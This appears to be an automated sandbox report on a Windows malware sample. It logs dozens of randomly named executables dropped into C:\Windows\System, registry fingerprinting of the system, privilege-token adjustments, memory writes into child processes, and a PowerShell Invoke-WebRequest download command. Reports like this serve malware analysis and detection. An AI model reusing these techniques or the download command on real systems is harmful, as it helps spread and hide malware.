File created C:\Windows\System\wYFWkag.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\LFkSzzy.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\XAypqMQ.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\mYjUCEz.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\ETMExkC.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\LPghGfz.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\LKzPwEm.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\pIoRBRZ.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\VjNZqto.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\sGuIJrm.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\yRkIQbJ.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\oqkLIpc.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\bNTFOlw.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\ajLRbid.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\yhUDVQr.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\mybQhoC.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\NvFjzHq.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\eGmyznq.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\MxjpZXu.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\IwMuKCC.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\UDnjhTp.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\WRnwTQa.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\Vjytlmw.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\THhAzsR.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\xPivZQX.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\XbFJcRD.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\GsdqxiI.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\WqhNVhk.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\wfTHgDX.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\llkyTRZ.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\kMaFbul.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\FRHYrkM.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\WHiQAZY.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\ccFujJj.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\iGuYRrx.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\LUqGPRC.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\JuOYMPT.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\ecFIALa.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\oBlwrhK.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\uiAGBcq.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\VuVbiTZ.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\PyGRJTg.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\blXZuqL.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\OXVQUUQ.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\CXYQJSb.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
File created C:\Windows\System\fQxOulw.exe C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 784 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 784 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 784 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\WnVnaHp.exe
PID 784 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\WnVnaHp.exe
PID 784 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\weaUVMN.exe
PID 784 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\weaUVMN.exe
PID 784 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\TfBQgnu.exe
PID 784 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\TfBQgnu.exe
PID 784 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\bECuTmG.exe
PID 784 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\bECuTmG.exe
PID 784 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\flOsYXL.exe
PID 784 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\flOsYXL.exe
PID 784 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\ajLRbid.exe
PID 784 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\ajLRbid.exe
PID 784 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\EGDRlKX.exe
PID 784 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\EGDRlKX.exe
PID 784 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\SiwaOlT.exe
PID 784 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\SiwaOlT.exe
PID 784 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\tcMLHGp.exe
PID 784 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\tcMLHGp.exe
PID 784 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\Tieqvxf.exe
PID 784 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\Tieqvxf.exe
PID 784 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\KiBJKSd.exe
PID 784 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\KiBJKSd.exe
PID 784 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\LaoOQzD.exe
PID 784 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\LaoOQzD.exe
PID 784 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\ecFIALa.exe
PID 784 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\ecFIALa.exe
PID 784 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\SnQqwqi.exe
PID 784 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\SnQqwqi.exe
PID 784 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\WfAaKga.exe
PID 784 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\WfAaKga.exe
PID 784 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\lbgnPWk.exe
PID 784 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\lbgnPWk.exe
PID 784 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\PnTVvPl.exe
PID 784 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\PnTVvPl.exe
PID 784 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\DQJnKAF.exe
PID 784 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\DQJnKAF.exe
PID 784 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\fTZAIqa.exe
PID 784 wrote to memory of 332 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\fTZAIqa.exe
PID 784 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\gZuEqpn.exe
PID 784 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\gZuEqpn.exe
PID 784 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\KYMOnNP.exe
PID 784 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\KYMOnNP.exe
PID 784 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\SSBFIdN.exe
PID 784 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\SSBFIdN.exe
PID 784 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\OyIiRIE.exe
PID 784 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\OyIiRIE.exe
PID 784 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\bJaBNnG.exe
PID 784 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\bJaBNnG.exe
PID 784 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\jgkMQgR.exe
PID 784 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\jgkMQgR.exe
PID 784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\lCQbkxd.exe
PID 784 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\lCQbkxd.exe
PID 784 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\JVDRIoK.exe
PID 784 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\JVDRIoK.exe
PID 784 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\yhUDVQr.exe
PID 784 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\yhUDVQr.exe
PID 784 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\BvUIybk.exe
PID 784 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\BvUIybk.exe
PID 784 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\GHFVUlj.exe
PID 784 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\GHFVUlj.exe
PID 784 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\XeQfIXb.exe
PID 784 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\XeQfIXb.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\WnVnaHp.exe

C:\Windows\System\WnVnaHp.exe

C:\Windows\System\weaUVMN.exe

C:\Windows\System\weaUVMN.exe

C:\Windows\System\TfBQgnu.exe

C:\Windows\System\TfBQgnu.exe

C:\Windows\System\bECuTmG.exe

C:\Windows\System\bECuTmG.exe

C:\Windows\System\flOsYXL.exe

C:\Windows\System\flOsYXL.exe

C:\Windows\System\ajLRbid.exe

C:\Windows\System\ajLRbid.exe

C:\Windows\System\EGDRlKX.exe

C:\Windows\System\EGDRlKX.exe

C:\Windows\System\SiwaOlT.exe

C:\Windows\System\SiwaOlT.exe

C:\Windows\System\tcMLHGp.exe

C:\Windows\System\tcMLHGp.exe

C:\Windows\System\Tieqvxf.exe

C:\Windows\System\Tieqvxf.exe

C:\Windows\System\KiBJKSd.exe

C:\Windows\System\KiBJKSd.exe

C:\Windows\System\LaoOQzD.exe

C:\Windows\System\LaoOQzD.exe

C:\Windows\System\ecFIALa.exe

C:\Windows\System\ecFIALa.exe

C:\Windows\System\SnQqwqi.exe

C:\Windows\System\SnQqwqi.exe

C:\Windows\System\WfAaKga.exe

C:\Windows\System\WfAaKga.exe

C:\Windows\System\lbgnPWk.exe

C:\Windows\System\lbgnPWk.exe

C:\Windows\System\PnTVvPl.exe

C:\Windows\System\PnTVvPl.exe

C:\Windows\System\DQJnKAF.exe

C:\Windows\System\DQJnKAF.exe

C:\Windows\System\fTZAIqa.exe

C:\Windows\System\fTZAIqa.exe

C:\Windows\System\gZuEqpn.exe

C:\Windows\System\gZuEqpn.exe

C:\Windows\System\KYMOnNP.exe

C:\Windows\System\KYMOnNP.exe

C:\Windows\System\SSBFIdN.exe

C:\Windows\System\SSBFIdN.exe

C:\Windows\System\OyIiRIE.exe

C:\Windows\System\OyIiRIE.exe

C:\Windows\System\bJaBNnG.exe

C:\Windows\System\bJaBNnG.exe

C:\Windows\System\jgkMQgR.exe

C:\Windows\System\jgkMQgR.exe

C:\Windows\System\lCQbkxd.exe

C:\Windows\System\lCQbkxd.exe

C:\Windows\System\JVDRIoK.exe

C:\Windows\System\JVDRIoK.exe

C:\Windows\System\yhUDVQr.exe

C:\Windows\System\yhUDVQr.exe

C:\Windows\System\BvUIybk.exe

C:\Windows\System\BvUIybk.exe

C:\Windows\System\GHFVUlj.exe

C:\Windows\System\GHFVUlj.exe

C:\Windows\System\XeQfIXb.exe

C:\Windows\System\XeQfIXb.exe

C:\Windows\System\VJeunQw.exe

C:\Windows\System\VJeunQw.exe

C:\Windows\System\BhmhpLH.exe

C:\Windows\System\BhmhpLH.exe

C:\Windows\System\XXjYvUP.exe

C:\Windows\System\XXjYvUP.exe

C:\Windows\System\DELMnBH.exe

C:\Windows\System\DELMnBH.exe

C:\Windows\System\UHWUAPA.exe

C:\Windows\System\UHWUAPA.exe

C:\Windows\System\ASQntDS.exe

C:\Windows\System\ASQntDS.exe

C:\Windows\System\eSDrCTy.exe

C:\Windows\System\eSDrCTy.exe

C:\Windows\System\vDmxQhz.exe

C:\Windows\System\vDmxQhz.exe

C:\Windows\System\GsdqxiI.exe

C:\Windows\System\GsdqxiI.exe

C:\Windows\System\KGcdzah.exe

C:\Windows\System\KGcdzah.exe

C:\Windows\System\iatEjSM.exe

C:\Windows\System\iatEjSM.exe

C:\Windows\System\mybQhoC.exe

C:\Windows\System\mybQhoC.exe

C:\Windows\System\lojdnzb.exe

C:\Windows\System\lojdnzb.exe

C:\Windows\System\doCOMtg.exe

C:\Windows\System\doCOMtg.exe

C:\Windows\System\ACKhOBF.exe

C:\Windows\System\ACKhOBF.exe

C:\Windows\System\dBMAvYC.exe

C:\Windows\System\dBMAvYC.exe

C:\Windows\System\dihvrhY.exe

C:\Windows\System\dihvrhY.exe

C:\Windows\System\MpmOYbs.exe

C:\Windows\System\MpmOYbs.exe

C:\Windows\System\MsndRgr.exe

C:\Windows\System\MsndRgr.exe

C:\Windows\System\TtmegZA.exe

C:\Windows\System\TtmegZA.exe

C:\Windows\System\IwMuKCC.exe

C:\Windows\System\IwMuKCC.exe

C:\Windows\System\RljABfK.exe

C:\Windows\System\RljABfK.exe

C:\Windows\System\cgDuNmv.exe

C:\Windows\System\cgDuNmv.exe

C:\Windows\System\oBlwrhK.exe

C:\Windows\System\oBlwrhK.exe

C:\Windows\System\OXVQUUQ.exe

C:\Windows\System\OXVQUUQ.exe

C:\Windows\System\wJkuAAc.exe

C:\Windows\System\wJkuAAc.exe

C:\Windows\System\NJXmSvt.exe

C:\Windows\System\NJXmSvt.exe

C:\Windows\System\uiAGBcq.exe

C:\Windows\System\uiAGBcq.exe

C:\Windows\System\bXjqmUb.exe

C:\Windows\System\bXjqmUb.exe

C:\Windows\System\KTBjlCq.exe

C:\Windows\System\KTBjlCq.exe

C:\Windows\System\ilimmOT.exe

C:\Windows\System\ilimmOT.exe

C:\Windows\System\wTpJfPE.exe

C:\Windows\System\wTpJfPE.exe

C:\Windows\System\goweHgT.exe

C:\Windows\System\goweHgT.exe

C:\Windows\System\RQoTCBc.exe

C:\Windows\System\RQoTCBc.exe

C:\Windows\System\IjmkHNx.exe

C:\Windows\System\IjmkHNx.exe

C:\Windows\System\OZxMrvl.exe

C:\Windows\System\OZxMrvl.exe

C:\Windows\System\VRmBrAh.exe

C:\Windows\System\VRmBrAh.exe

C:\Windows\System\TGhJLIh.exe

C:\Windows\System\TGhJLIh.exe

C:\Windows\System\HNMXWFa.exe

C:\Windows\System\HNMXWFa.exe

C:\Windows\System\dvMUUQx.exe

C:\Windows\System\dvMUUQx.exe

C:\Windows\System\jFDhAZR.exe

C:\Windows\System\jFDhAZR.exe

C:\Windows\System\xkioFMG.exe

C:\Windows\System\xkioFMG.exe

C:\Windows\System\QHAmYBA.exe

C:\Windows\System\QHAmYBA.exe

C:\Windows\System\jJHCEfc.exe

C:\Windows\System\jJHCEfc.exe

C:\Windows\System\lERjlyC.exe

C:\Windows\System\lERjlyC.exe

C:\Windows\System\vYJMRoz.exe

C:\Windows\System\vYJMRoz.exe

C:\Windows\System\bfOwkMA.exe

C:\Windows\System\bfOwkMA.exe

C:\Windows\System\iFeEsnv.exe

C:\Windows\System\iFeEsnv.exe

C:\Windows\System\hFmJhVR.exe

C:\Windows\System\hFmJhVR.exe

C:\Windows\System\sAgRTeY.exe

C:\Windows\System\sAgRTeY.exe

C:\Windows\System\TftoPfz.exe

C:\Windows\System\TftoPfz.exe

C:\Windows\System\YNETjmV.exe

C:\Windows\System\YNETjmV.exe

C:\Windows\System\JNFVTyT.exe

C:\Windows\System\JNFVTyT.exe

C:\Windows\System\dIGygDW.exe

C:\Windows\System\dIGygDW.exe

C:\Windows\System\EpwUHSm.exe

C:\Windows\System\EpwUHSm.exe

C:\Windows\System\mVniwYL.exe

C:\Windows\System\mVniwYL.exe

C:\Windows\System\TdaBFhP.exe

C:\Windows\System\TdaBFhP.exe

C:\Windows\System\FVICGIm.exe

C:\Windows\System\FVICGIm.exe

C:\Windows\System\zUzENFN.exe

C:\Windows\System\zUzENFN.exe

C:\Windows\System\jXxLxJZ.exe

C:\Windows\System\jXxLxJZ.exe

C:\Windows\System\GhslvJn.exe

C:\Windows\System\GhslvJn.exe

C:\Windows\System\lZjIYjf.exe

C:\Windows\System\lZjIYjf.exe

C:\Windows\System\JpiNxRV.exe

C:\Windows\System\JpiNxRV.exe

C:\Windows\System\sBvSuAh.exe

C:\Windows\System\sBvSuAh.exe

C:\Windows\System\EvcQigH.exe

C:\Windows\System\EvcQigH.exe

C:\Windows\System\pGyAeCU.exe

C:\Windows\System\pGyAeCU.exe

C:\Windows\System\YsFzAjN.exe

C:\Windows\System\YsFzAjN.exe

C:\Windows\System\gPuQwzI.exe

C:\Windows\System\gPuQwzI.exe

C:\Windows\System\HAmVxSA.exe

C:\Windows\System\HAmVxSA.exe

C:\Windows\System\kVfpJsU.exe

C:\Windows\System\kVfpJsU.exe

C:\Windows\System\DIpACzx.exe

C:\Windows\System\DIpACzx.exe

